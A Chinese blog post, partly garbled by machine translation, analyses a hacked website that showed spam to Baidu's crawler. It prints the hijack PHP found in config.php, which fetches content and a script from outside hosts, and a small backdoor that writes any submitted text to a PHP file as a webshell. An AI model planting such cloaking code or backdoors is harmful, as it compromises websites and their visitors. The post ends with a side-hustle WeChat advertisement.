挂黑链接教程怎么黑链接

投稿用户 • 2022年12月13日 pm11:28 • 副业项目 • 阅读 118

抢劫和抢劫网站遇到了很多，大约一年后，今天偶然遇到网民寻求帮助网站劫持问题，因为这个问题我没有直接分析挂马的方式，因为今天有点特别想详细分解常规挂马的方式和清理想法。

网站挂马劫持的必然性

一般来说，你的网站不是特别入侵的。一般来说，你的网站不会因为报复而公然劫持。

因此，一般网站劫持将用于发布灰色广告或制作黑帽SEO。你的网站被入侵的原因是挂马者使用批量getshell工具，根据某个漏洞批量获取具有相同漏洞的网站，然后将相关劫持代码添加到您的网站程序中，这一系列行动由工具批量完成。

事实上，在我看来，如果你发现你的网站被一匹马劫持，你可以乐观。至少你会知道你的网站有严重的漏洞，但你只是被工具劫持，而不是被同行使用。如果你被一个特殊的入侵者赢了，你通常不会简单地为你挂一匹马。会有多严重？这取决于你的心情。不要开玩笑，但你碰巧不明白。木马隐藏得好，这匹马将伴随你一生，白头到老。

挂马症状

长话短说，一般来说，你会在搜索结果中搜索相关关键词或你自己的网站。你看到的标题可能不是你自己的网站标题。点击可能会跳转到其他地方，或者进入后发现网站不对劲。

如：

本来是一个PS网站标题变成羞耻的内容，内容不再(wo)堪(hen)入(xi)目(huan)

劫持分析

这种情况显然是挂马脚本user-agent如果user-agent如果是百度蜘蛛，会回广告。

一般会插入网站程序JS，或者在php或者在其他程序中插入代码，如果是js，一般来说，劫持可以通过远程调用来实现，插入代码很少。

上面提到的凤楼……呸，是PS一开始，我习惯性地判断网络是js劫持。于是我以错误的方向开始了分析之旅。

第一步:在审核元素中查看网络连接

当网站正常打开时，首先查看脚本没有加载异常

其中加载的js打开简单的脚本，看看没有发现异常的脚本有点慌。如果不引入外部脚本，可能会隐藏在现有脚本中。JS一般来说，隐藏也是加密的，很难找到，所以每个人js一个一个检查文件，还是没有发现。

第二步：抓包分析

第一步没有直接分析，一般要么马藏得很深，要么根本不用JS，所以需要抓包分析，怎么抓？这里就不多说了，可以在我之前的文章里找到。

首先重现跳转场景：

设置浏览器user-agent 为百度蜘蛛，这里我祭祀一只超级好用的蜘蛛chrome插件

先用burpsuite抓一下看，但是要先配置不过滤的过滤器JS脚本，

配置代理，回车，走你

get首页，肯定没问题，forward这一次很重要，如果下一步抓住的话js，主页还没跳，说明js搞鬼，真相是……没抓到js，出来直接抓一个html页面，这个页面是404，然后篡改主页直接跳出来！

副业资源项目

这说明？

说明程序直接加载主页文件，即index.php开始捣鬼的时候。

至此可判断为php挂马，在前端搜索没有有用的信息。

第三步：找木马

副业项目网这时，姐妹纸包发了网站程序源码，ps：姐妹纸防备，不给服务器权限，但给源代码或给一切啊！虽然没有可用的地方，但我至少知道它绝对隐藏着shell呢！

一般挂马程序直接插入黑链代码index.php在中间，不会有太多的判断，这种情况出现在企业站更多，所以自然打开index.php，发现无异常，无异常include异常php文件。

看到这里，我觉得这个套路还是有点深，至少没那么明显。

继续寻找加载的文件。这时候脑子大开，直接去数据库配置文件，然后就这样结束了抓马之旅。是的，马在config.php文件中

<?php
if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER ["HTTP_USER_AGENT"])) {
$file = file_get_contents('http://z.*****.com/jie/70.html');
echo $file;
exit;
}
if(stristr ($_SERVER['HTTP_REFERER'],"http://www.baidu.com")) {
echo "<script language='javascript' src='http://z.sloufeng.com/jc.js'></script><br/>";
exit;
}
?>

简单分析一下，这已经是最简单的劫持代码了user-aget 如果是百度蜘蛛，把网页:http://z.******.com/jie/70.html内容输出，是的，这是你想要的凤楼信息；然后判断referer是否为www.baidu.com，如果是加载下面的js，这个js还有一层判断，反正还有很多业务，比如菠菜。

其实我并没有找太多相关的。php文件，因为很明显这匹马是批量实现的，程序不会太智能地隐藏马那么深，数据库文件必须加载，结果，没有加密，坏评论！

第四步：找shell

下面就是找shell嗯，我没有详细寻找，只是在同一目录下找到了一个后门，非常简单的

<?php
$dq = fopen($_SERVER["DOCUMENT_ROOT"].'/config/jc.php','w ');
fwrite($dq,$_GET['msg']);
?>

www.xxx.com/config/file.php?msg=一句话木马

这样，在目录下写一句话jc.php

题外话:这个凤楼广告没有任何联系方式和网站！有什么意义？

先就这些吧

今天的文章就分享到这里，如果你也网赚副业项目感兴趣，可以添加维信：beng6655 备注：副业！

本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容，请发送邮件至 526323532@qq.com 举报，一经查实，本站将立刻删除。
如若转载，请注明出处：https://www.haoxue2.com/20402.html